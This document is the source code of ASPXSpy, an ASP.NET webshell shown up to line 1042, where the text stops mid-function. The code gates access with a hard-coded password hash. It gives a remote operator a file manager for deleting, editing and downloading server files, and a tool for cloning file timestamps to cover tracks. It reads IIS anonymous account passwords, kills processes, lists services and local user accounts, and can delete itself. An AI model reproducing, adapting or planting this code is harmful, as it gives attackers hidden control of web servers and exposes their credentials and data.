Asp_shell [webshell]

1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
2. <%@ import Namespace="System.IO"%>
3. <%@ import Namespace="System.Diagnostics"%>
4. <%@ import Namespace="System.Data"%>
5. <%@ import Namespace="System.Management"%>
6. <%@ import Namespace="System.Data.OleDb"%>
7. <%@ import Namespace="Microsoft.Win32"%>
8. <%@ import Namespace="System.Net.Sockets" %>
9. <%@ import Namespace="System.Net" %>
10. <%@ import Namespace="System.Runtime.InteropServices"%>
11. <%@ import Namespace="System.DirectoryServices"%>
12. <%@ import Namespace="System.ServiceProcess"%>
13. <%@ import Namespace="System.Text.RegularExpressions"%>
14. <%@ Import Namespace="System.Threading"%>
15. <%@ Import Namespace="System.Data.SqlClient"%>
16. <%@ import Namespace="Microsoft.VisualBasic"%>
17. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
18. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
19. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
20. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
22. <script runat="server">
23. /*
24. Thanks Snailsor,FuYu,BloodSword,Cnqing,
25. Code by Bin
26. Make in China
27. Blog: http://www.rootkit.net.cn
28. E-mail : [email protected]
29. */
30. public string Password="21232f297a57a5a743894a0e4a801fc3";//admin
31. public string vbhLn="ASPXSpy";
32. public int TdgGU=1;
33. protected OleDbConnection Dtdr=new OleDbConnection();
34. protected OleDbCommand Kkvb=new OleDbCommand();
35. public NetworkStream NS=null;
36. public NetworkStream NS1=null;
37. TcpClient tcp=new TcpClient();
38. TcpClient zvxm=new TcpClient();
39. ArrayList IVc=new ArrayList();
40. protected void Page_load(object sender,EventArgs e)
41. {
42. YFcNP(this);
43. fhAEn();
44. if (!pdo())
45. {
46. return;
47. }
48. if(IsPostBack)
49. {
50. string tkI=Request["__EVENTTARGET"];
51. string VqV=Request["__File"];
52. if(tkI!="")
53. {
54. switch(tkI)
55. {
56. case "Bin_Parent":
57. krIR(Ebgw(VqV));
58. break;
59. case "Bin_Listdir":
60. krIR(Ebgw(VqV));
61. break;
62. case "kRXgt":
63. kRXgt(Ebgw(VqV));
64. break;
65. case "Bin_Createfile":
66. gLKc(VqV);
67. break;
68. case "Bin_Editfile":
69. gLKc(VqV);
70. break;
71. case "Bin_Createdir":
72. stNPw(VqV);
73. break;
74. case "cYAl":
75. cYAl(VqV);
76. break;
77. case "ksGR":
78. ksGR(Ebgw(VqV));
79. break;
80. case "SJv":
81. SJv(VqV);
82. break;
83. case "Bin_Regread":
84. tpRQ(Ebgw(VqV));
85. break;
86. case "hae":
87. hae();
88. break;
89. case "urJG":
90. urJG(VqV);
91. break;
92. }
93. if(tkI.StartsWith("dAJTD"))
94. {
95. dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
96. }
97. else if(tkI.StartsWith("Tlvz"))
98. {
99. Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
100. }
101. else if(tkI.StartsWith("Bin_CFile"))
102. {
103. YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
104. }
105. }
106. }
107. else
108. {
109. PBZw();
110. }
111. }
112. public bool pdo()
113. {
114. if(Request.Cookies[vbhLn]==null)
115. {
116. tZSx();
117. return false;
118. }
119. else
120. {
121. if (Request.Cookies[vbhLn].Value != Password)
122. {
123. tZSx();
124. return false;
125. }
126. else
127. {
128. return true;
129. }
130. }
131. }
132. public void tZSx()
133. {
134. ljtzC.Visible=true;
135. ZVS.Visible=false;
136. }
137. protected void YKpI(object sender,EventArgs e)
138. {
139. Session.Abandon();
140. Response.Cookies.Add(new HttpCookie(vbhLn,null));
141. tZSx();
142. }
143. public void PBZw()
144. {
145. ZVS.Visible=true;
146. ljtzC.Visible=false;
147. Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
148. Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
149. Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
150. Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
151. Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
152. if (AXSbb.Value==string.Empty)
153. {
154. AXSbb.Value=OElM(Server.MapPath("."));
155. }
156. Bin_H2_Title.InnerText="File Manager >>";
157. krIR(AXSbb.Value);
158. }
159. public void fhAEn()
160. {
161. try
162. {
163. string[] YRgt=Directory.GetLogicalDrives();
164. for(int i=0;i<YRgt.Length;i++)
165. {
166. Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
167. Bin_Span_Drv.Controls.Add(c);
168. LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
169. nxeDR.Command+=new CommandEventHandler(this.iVk);
170. }
171. }catch(Exception ex){}
172. }
173. public string OElM(string path)
174. {
175. if(path.Substring(path.Length-1,1)!=@"\")
176. {
177. path=path+@"\";
178. }
179. return path;
180. }
181. public string nrrx(string path)
182. {
183. char[] trim={'\\'};
184. if(path.Substring(path.Length-1,1)==@"\")
185. {
186. path=path.TrimEnd(trim);
187. }
188. return path;
189. }
190. [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
191. public static extern int OMZP(string nDrive);
192. public string mFvj(string instr)
193. {
194. string EuXD=string.Empty;
195. int num=OMZP(instr);
196. switch(num)
197. {
198. case 1:
199. EuXD="Unknow("+instr+")";
200. break;
201. case 2:
202. EuXD="Removable("+instr+")";
203. break;
204. case 3:
205. EuXD="Fixed("+instr+")";
206. break;
207. case 4:
208. EuXD="Network("+instr+")";
209. break;
210. case 5:
211. EuXD="CDRom("+instr+")";
212. break;
213. case 6:
214. EuXD="RAM Disk("+instr+")";
215. break;
216. }
217. return EuXD.Replace(@"\","");
218. }
219. public string MVVJ(string instr)
220. {
221. byte[] tmp=Encoding.Default.GetBytes(instr);
222. return Convert.ToBase64String(tmp);
223. }
224. public string Ebgw(string instr)
225. {
226. byte[] tmp=Convert.FromBase64String(instr);
227. return Encoding.Default.GetString(tmp);
228. }
229. public void krIR(string path)
230. {
231. WICxe();
232. CzfO.Visible=true;
233. Bin_H2_Title.InnerText="File Manager >>";
234. AXSbb.Value=OElM(path);
235. DirectoryInfo GQMM=new DirectoryInfo(path);
236. if(Directory.GetParent(nrrx(path))!=null)
237. {
238. string bg=OKM();
239. TableRow p=new TableRow();
240. for(int i=1;i<6;i++)
241. {
242. TableCell pc=new TableCell();
243. if(i==1)
244. {
245. pc.Width=Unit.Parse("2%");
246. pc.Text="0";
247. p.CssClass=bg;
248. }
249. if(i==2)
250. {
251. pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
252. }
253. p.Cells.Add(pc);
254. UGzP.Rows.Add(p);
255. }
256. }
257. try
258. {
259. int vLlH=0;
260. foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
261. {
262. string bg=OKM();
263. vLlH++;
264. TableRow tr=new TableRow();
265. TableCell tc=new TableCell();
266. tc.Width=Unit.Parse("2%");
267. tc.Text="0";
268. tr.Attributes["onmouseover"]="this.className='focus';";
269. tr.CssClass=bg;
270. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
271. tr.Cells.Add(tc);
272. TableCell HczyN=new TableCell();
273. HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
274. tr.Cells.Add(HczyN);
275. TableCell LYZK=new TableCell();
276. LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
277. tr.Cells.Add(LYZK);
278. UGzP.Rows.Add(tr);
279. TableCell ERUL=new TableCell();
280. ERUL.Text="--";
281. tr.Cells.Add(ERUL);
282. UGzP.Rows.Add(tr);
283. TableCell ZGKh=new TableCell();
284. ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
285. tr.Cells.Add(ZGKh);
286. UGzP.Rows.Add(tr);
287. }
288. TableRow cKVA=new TableRow();
289. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
290. cKVA.Attributes["bgcolor"]="#dddddd";
291. TableCell JlmW=new TableCell();
292. JlmW.Attributes["colspan"]="6" ;
293. JlmW.Attributes["height"]="5";
294. cKVA.Cells.Add(JlmW);
295. UGzP.Rows.Add(cKVA);
296. int aYRwo=0;
297. foreach(FileInfo Bin_Files in GQMM.GetFiles())
298. {
299. aYRwo++;
300. string gb=OKM();
301. TableRow tr=new TableRow();
302. TableCell tc=new TableCell();
303. tc.Width=Unit.Parse("2%");
304. tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
305. tr.Attributes["onmouseover"]="this.className='focus';";
306. tr.CssClass=gb;
307. tr.Attributes["onmouseout"]="this.className='"+gb+"';";
308. tr.Cells.Add(tc);
309. TableCell filename=new TableCell();
310. if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
311. {
312. string url=Request.Url.ToString();
313. filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
314. }
315. else
316. {
317. filename.Text=Bin_Files.Name;
318. }
319. TableCell albt=new TableCell();
320. albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
321. TableCell YzK=new TableCell();
322. YzK.Text=mTG(Bin_Files.Length);
323. TableCell GLpi=new TableCell();
324. GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
325. tr.Cells.Add(filename);
326. tr.Cells.Add(albt);
327. tr.Cells.Add(YzK);
328. tr.Cells.Add(GLpi);
329. UGzP.Rows.Add(tr);
330. }
331. string lgb=OKM();
332. TableRow oWam=new TableRow();
333. oWam.CssClass=lgb;
334. for(int i=1;i<4;i++)
335. {
336. TableCell lGV=new TableCell();
337. if(i==1)
338. {
339. lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
340. }
341. if(i==2)
342. {
343. lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
344. }
345. if(i==3)
346. {
347. lGV.ColumnSpan=4;
348. lGV.Style.Add("text-align","right");
349. lGV.Text=vLlH+" directories/ "+aYRwo+" files";
350. }
351. oWam.Cells.Add(lGV);
352. }
353. UGzP.Rows.Add(oWam);
354. }
355. catch(Exception error)
356. {
357. xseuB(error.Message);
358. }
359. }
360. public string OKM()
361. {
362. TdgGU++;
363. if(TdgGU % 2==0)
364. {
365. return "alt1";
366. }
367. else
368. {
369. return "alt2";
370. }
371. }
372. public void kRXgt(string qcKu)
373. {
374. try
375. {
376. Directory.Delete(qcKu,true);
377. xseuB("Directory delete new success !");
378. }
379. catch(Exception error)
380. {
381. xseuB(error.Message);
382. }
383. krIR(Directory.GetParent(qcKu).ToString());
384. }
385. public void dAJTD(string sdir,string ddir)
386. {
387. try
388. {
389. Directory.Move(sdir,ddir);
390. xseuB("Directory Renamed Success !");
391. }
392. catch(Exception error)
393. {
394. xseuB(error.Message);
395. }
396. krIR(AXSbb.Value);
397. }
398. public void Tlvz(string sfile,string dfile)
399. {
400. try
401. {
402. File.Move(sfile,dfile);
403. xseuB("File Renamed Success !");
404. }
405. catch(Exception error)
406. {
407. xseuB(error.Message);
408. }
409. krIR(AXSbb.Value);
410. }
411. public void YByN(string spath,string dpath)
412. {
413. try
414. {
415. File.Copy(spath,dpath);
416. xseuB("File Copy Success !");
417. }
418. catch(Exception error)
419. {
420. xseuB(error.Message);
421. }
422. krIR(AXSbb.Value);
423. }
424. public void stNPw(string path)
425. {
426. try
427. {
428. Directory.CreateDirectory(AXSbb.Value+path);
429. xseuB("Directory created success !");
430. }
431. catch(Exception error)
432. {
433. xseuB(error.Message);
434. }
435. krIR(AXSbb.Value);
436. }
437. public void gLKc(string path)
438. {
439. if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
440. {
441. foreach(ListItem item in NdCX.Items)
442. {
443. if(item.Selected=true)
444. {
445. item.Selected=false;
446. }
447. }
448. }
449. Bin_H2_Title.InnerHtml="Create/ Edit File >>";
450. WICxe();
451. vrFA.Visible=true;
452. if(path.IndexOf(":")< 0)
453. {
454. Sqon.Value=AXSbb.Value+path;
455. }
456. else
457. {
458. Sqon.Value=path;
459. }
460. if(File.Exists(Sqon.Value))
461. {
462. StreamReader sr;
463. if(NdCX.SelectedItem.Text=="UTF-8")
464. {
465. sr=new StreamReader(Sqon.Value,Encoding.UTF8);
466. }
467. else
468. {
469. sr=new StreamReader(Sqon.Value,Encoding.Default);
470. }
471. Xgvv.InnerText=sr.ReadToEnd();
472. sr.Close();
473. }
474. else
475. {
476. Xgvv.InnerText=string.Empty;
477. }
478. }
479. public void ksGR(string path)
480. {
481. FileInfo fs=new FileInfo(path);
482. Response.Clear();
483. Page.Response.ClearHeaders();
484. Page.Response.Buffer=false;
485. this.EnableViewState=false;
486. Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
487. Response.AddHeader("Content-Length",fs.Length.ToString());
488. Page.Response.ContentType="application/unknown";
489. Response.WriteFile(fs.FullName);
490. Page.Response.Flush();
491. Page.Response.Close();
492. Response.End();
493. Page.Response.Clear();
494. }
495. public void SJv(string path)
496. {
497. try
498. {
499. string[] spdT=path.Split(',');
500. for(int i=0;i<spdT.Length-1;i++)
501. {
502. File.Delete(AXSbb.Value+Ebgw(spdT[i]));
503. }
504. xseuB("File Delete Success !");
505. }
506. catch(Exception error)
507. {
508. xseuB(error.Message);
509. }
510. krIR(AXSbb.Value);
511. }
512. public void hae()
513. {
514. try
515. {
516. File.Delete(Request.PhysicalPath);
517. Response.Redirect("http://www.rootkit.net.cn");
518. }
519. catch(Exception error)
520. {
521. xseuB(error.Message);
522. }
523. }
524. public void cYAl(string path)
525. {
526. Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
527. WICxe();
528. zRyG.Visible=true;
529. QiFB.Value=AXSbb.Value+path;
530. lICp.Value=AXSbb.Value;
531. pWVL.Value=AXSbb.Value+path;
532. string Att=File.GetAttributes(QiFB.Value).ToString();
533. if(Att.LastIndexOf("ReadOnly")!=-1)
534. {
535. ZhWSK.Checked=true;
536. }
537. if(Att.LastIndexOf("System")!=-1)
538. {
539. SsR.Checked=true;
540. }
541. if(Att.LastIndexOf("Hidden")!=-1)
542. {
543. ccB.Checked=true;
544. }
545. if(Att.LastIndexOf("Archive")!=-1)
546. {
547. fbyZ.Checked=true;
548. }
549. yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
550. uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
551. aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
552. }
553. public static String mTG(Int64 fileSize)
554. {
555. if(fileSize<0)
556. {
557. throw new ArgumentOutOfRangeException("fileSize");
558. }
559. else if(fileSize >= 1024 * 1024 * 1024)
560. {
561. return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
562. }
563. else if(fileSize >= 1024 * 1024)
564. {
565. return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
566. }
567. else if(fileSize >= 1024)
568. {
569. return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
570. }
571. else
572. {
573. return string.Format("{0} B",fileSize);
574. }
575. }
576. private bool SGde(string sSrc)
577. {
578. Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
579. if(reg.IsMatch(sSrc))
580. {
581. return true;
582. }
583. else
584. {
585. return false;
586. }
587. }
588. public void AdCx()
589. {
590. string qcKu=string.Empty;
591. string mWGEm="IIS://localhost/W3SVC";
592. GlI.Style.Add("word-break","break-all");
593. try
594. {
595. DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
596. int fmW=0;
597. foreach(DirectoryEntry child in HHzcY.Children)
598. {
599. if(SGde(child.Name.ToString()))
600. {
601. fmW++;
602. DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
603. DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
604. string bg=OKM();
605. TableRow TR=new TableRow();
606. TR.Attributes["onmouseover"]="this.className='focus';";
607. TR.CssClass=bg;
608. TR.Attributes["onmouseout"]="this.className='"+bg+"';";
609. TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
610. for(int i=1;i<6;i++)
611. {
612. try
613. {
614. TableCell tfit=new TableCell();
615. switch(i)
616. {case 1:
617. tfit.Text=fmW.ToString();
618. break;
619. case 2:
620. tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
621. break;
622. case 3:
623. tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
624. break;
625. case 4:
626. StringBuilder sb=new StringBuilder();
627. PropertyValueCollection pc=child.Properties["ServerBindings"];
628. for (int j=0; j < pc.Count; j++)
629. {
630. sb.Append(pc[j].ToString()+"<br>");
631. }
632. tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
633. break;
634. case 5:
635. tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
636. break;
637. }
638. TR.Cells.Add(tfit);
639. }
640. catch (Exception ex)
641. {
642. xseuB(ex.Message);
643. continue;
644. }
645. }
646. GlI.Controls.Add(TR);
647. }
648. }
649. }
650. catch(Exception ex)
651. {
652. xseuB(ex.Message);
653. }
654. }
655. public ManagementObjectCollection PhQTd(string query)
656. {
657. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
658. return QS.Get();
659. }
660. public DataTable cCf(string query)
661. {
662. DataTable dt=new DataTable();
663. int i=0;
664. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
665. try
666. {
667. foreach(ManagementObject m in QS.Get())
668. {
669. DataRow dr=dt.NewRow();
670. PropertyDataCollection.PropertyDataEnumerator oEnum;
671. oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
672. while(oEnum.MoveNext())
673. {
674. PropertyData DRU=(PropertyData)oEnum.Current;
675. if(dt.Columns.IndexOf(DRU.Name)==-1)
676. {
677. dt.Columns.Add(DRU.Name);
678. dt.Columns[dt.Columns.Count-1].DefaultValue="";
679. }
680. if(m[DRU.Name]!=null)
681. {
682. dr[DRU.Name]=m[DRU.Name].ToString();
683. }
684. else
685. {
686. dr[DRU.Name]=string.Empty;
687. }
688. }
689. dt.Rows.Add(dr);
690. }
691. }
692. catch(Exception error)
693. {
694. }
695. return dt;
696. }
697. public void YUw()
698. {
699. try
700. {
701. Bin_H2_Title.InnerText="Process >>";
702. WICxe();
703. DCbS.Visible=true;
704. int UEbTI=0;
705. Process[] p=Process.GetProcesses();
706. foreach(Process sp in p)
707. {
708. UEbTI++;
709. string bg=OKM();
710. TableRow tr=new TableRow();
711. tr.Attributes["onmouseover"]="this.className='focus';";
712. tr.CssClass=bg;
713. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
714. for(int i=1;i<7;i++)
715. {
716. TableCell td=new TableCell();
717. if(i==1)
718. {
719. td.Width=Unit.Parse("2%");
720. td.Text=UEbTI.ToString();
721. tr.Controls.Add(td);
722. }
723. if(i==2)
724. {
725. td.Text=sp.Id.ToString();
726. tr.Controls.Add(td);
727. }
728. if(i==3)
729. {
730. td.Text=sp.ProcessName.ToString();
731. tr.Controls.Add(td);
732. }
733. if(i==4)
734. {
735. td.Text=sp.Threads.Count.ToString();
736. tr.Controls.Add(td);
737. }
738. if(i==5)
739. {
740. td.Text=sp.BasePriority.ToString();
741. tr.Controls.Add(td);
742. }
743. if(i==6)
744. {
745. td.Text="--";
746. tr.Controls.Add(td);
747. }
748. }
749. IjsL.Controls.Add(tr);
750. }
751. }
752. catch(Exception error)
753. {
754. AIz();
755. }
756. AIz();
757. }
758. public void AIz()
759. {
760. try
761. {
762. Bin_H2_Title.InnerText="Process >>";
763. WICxe();
764. DCbS.Visible=true;
765. int UEbTI=0;
766. DataTable dt=cCf("Win32_Process");
767. for(int j=0;j<dt.Rows.Count;j++)
768. {
769. UEbTI++;
770. string bg=OKM();
771. TableRow tr=new TableRow();
772. tr.Attributes["onmouseover"]="this.className='focus';";
773. tr.CssClass=bg;
774. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
775. for(int i=1;i<7;i++)
776. {
777. TableCell td=new TableCell();
778. if(i==1)
779. {
780. td.Width=Unit.Parse("2%");
781. td.Text=UEbTI.ToString();
782. tr.Controls.Add(td);
783. }
784. if(i==2)
785. {
786. td.Text=dt.Rows[j]["ProcessID"].ToString();
787. tr.Controls.Add(td);
788. }
789. if(i==3)
790. {
791. td.Text=dt.Rows[j]["Name"].ToString();
792. tr.Controls.Add(td);
793. }
794. if(i==4)
795. {
796. td.Text=dt.Rows[j]["ThreadCount"].ToString();
797. tr.Controls.Add(td);
798. }
799. if(i==5)
800. {
801. td.Text=dt.Rows[j]["Priority"].ToString();
802. tr.Controls.Add(td);
803. }
804. if(i==6)
805. {
806. if( dt.Rows[j]["CommandLine"]!=string.Empty)
807. {
808. td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
809. }
810. else
811. {
812. td.Text="--";
813. }
814. tr.Controls.Add(td);
815. }
816. }
817. IjsL.Controls.Add(tr);
818. }
819. }
820. catch(Exception error)
821. {
822. xseuB(error.Message);
823. }
824. }
825. public void urJG(string pid)
826. {
827. try
828. {
829. foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
830. {
831. p.InvokeMethod("Terminate",null);
832. p.Dispose();
833. }
834. xseuB("Process Kill Success !");
835. }
836. catch(Exception error)
837. {
838. xseuB(error.Message);
839. }
840. AIz();
841. }
842. public void oHpF()
843. {
844. try
845. {
846. Bin_H2_Title.InnerText="Services >>";
847. WICxe();
848. iQxm.Visible=true;
849. int UEbTI=0;
850. ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
851. for(int i=0;i<kQmRu.Length;i++)
852. {
853. UEbTI++;
854. string bg=OKM();
855. TableRow tr=new TableRow();
856. tr.Attributes["onmouseover"]="this.className='focus';";
857. tr.CssClass=bg;
858. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
859. for(int b=1;b<7;b++)
860. {
861. TableCell td=new TableCell();
862. if(b==1)
863. {
864. td.Width=Unit.Parse("2%");
865. td.Text=UEbTI.ToString();
866. tr.Controls.Add(td);
867. }
868. if(b==2)
869. {
870. td.Text="null";
871. tr.Controls.Add(td);
872. }
873. if(b==3)
874. {
875. td.Text=kQmRu[i].ServiceName.ToString();
876. tr.Controls.Add(td);
877. }
878. if(b==4)
879. {
880. td.Text="";
881. tr.Controls.Add(td);
882. }
883. if(b==5)
884. {
885. string kOIo=kQmRu[i].Status.ToString();
886. if(kOIo=="Running")
887. {
888. td.Text="<font color=green>"+kOIo+"</font>";
889. }
890. else
891. {
892. td.Text="<font color=red>"+kOIo+"</font>";
893. }
894. tr.Controls.Add(td);
895. }
896. if(b==6)
897. {
898. td.Text="";
899. tr.Controls.Add(td);
900. }
901. }
902. vHCs.Controls.Add(tr);
903. }
904. }
905. catch(Exception error)
906. {
907. xseuB(error.Message);
908. }
909. }
910. public void tZRH()
911. {
912. try
913. {
914. Bin_H2_Title.InnerText="Services >>";
915. WICxe();
916. iQxm.Visible=true;
917. int UEbTI=0;
918. DataTable dt=cCf("Win32_Service");
919. for(int j=0;j<dt.Rows.Count;j++)
920. {
921. UEbTI++;
922. string bg=OKM();
923. TableRow tr=new TableRow();
924. tr.Attributes["onmouseover"]="this.className='focus';";
925. tr.CssClass=bg;
926. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
927. tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
928. for(int i=1;i<7;i++)
929. {
930. TableCell td=new TableCell();
931. if(i==1)
932. {
933. td.Width=Unit.Parse("2%");
934. td.Text=UEbTI.ToString();
935. tr.Controls.Add(td);
936. }
937. if(i==2)
938. {
939. td.Text=dt.Rows[j]["ProcessID"].ToString();
940. tr.Controls.Add(td);
941. }
942. if(i==3)
943. {
944. td.Text=dt.Rows[j]["Name"].ToString();
945. tr.Controls.Add(td);
946. }
947. if(i==4)
948. {
949. td.Text=dt.Rows[j]["PathName"].ToString();
950. tr.Controls.Add(td);
951. }
952. if(i==5)
953. {
954. string kOIo=dt.Rows[j]["State"].ToString();
955. if(kOIo=="Running")
956. {
957. td.Text="<font color=green>"+kOIo+"</font>";
958. }
959. else
960. {
961. td.Text="<font color=red>"+kOIo+"</font>";
962. }
963. tr.Controls.Add(td);
964. }
965. if(i==6)
966. {
967. td.Text=dt.Rows[j]["StartMode"].ToString();
968. tr.Controls.Add(td);
969. }
970. }
971. vHCs.Controls.Add(tr);
972. }
973. }
974. catch(Exception error)
975. {
976. oHpF();
977. }
978. }
979. public void PLd()
980. {
981. try
982. {
983. WICxe();
984. xWVQ.Visible=true;
985. Bin_H2_Title.InnerText="User Information >>";
986. DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
987. foreach(DirectoryEntry child in TWQ.Children)
988. {
989. foreach(string name in child.Properties.PropertyNames)
990. {
991. PropertyValueCollection pvc=child.Properties[name];
992. int c=pvc.Count;
993. for(int i=0;i<c;i++)
994. {
995. if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
996. {
997. string bg=OKM();
998. TableRow tr=new TableRow();
999. tr.Attributes["onmouseover"]="this.className='focus';";
1000. tr.CssClass=bg;
1001. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1002. TableCell td=new TableCell();
1003. td.Text=name;
1004. tr.Controls.Add(td);
1005. TableCell td1=new TableCell();
1006. td1.Text=pvc[i].ToString();
1007. tr.Controls.Add(td1);
1008. VPa.Controls.Add(tr);
1009. }
1010. }
1011. }
1012. TableRow trn=new TableRow();
1013. for(int x=1;x<3;x++)
1014. {
1015. TableCell tdn=new TableCell();
1016. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1017. trn.Controls.Add(tdn);
1018. VPa.Controls.Add(trn);
1019. }
1020. }
1021. }
1022. catch(Exception error)
1023. {
1024. xseuB(error.Message);
1025. }
1026. }
1027. public void iLVUT()
1028. {
1029. try
1030. {
1031. WICxe();
1032. xWVQ.Visible=true;
1033. Bin_H2_Title.InnerText="User Information >>";
1034. DataTable user=cCf("Win32_UserAccount");
1035. for(int i=0;i<user.Rows.Count;i++)
1036. {
1037. for(int j=0;j<user.Columns.Count;j++)
1038. {
1039. string bg=OKM();
1040. TableRow tr=new TableRow();
1041. tr.Attributes["onmouseover"]="this.className='focus';";
1042. tr.CssClass=bg;
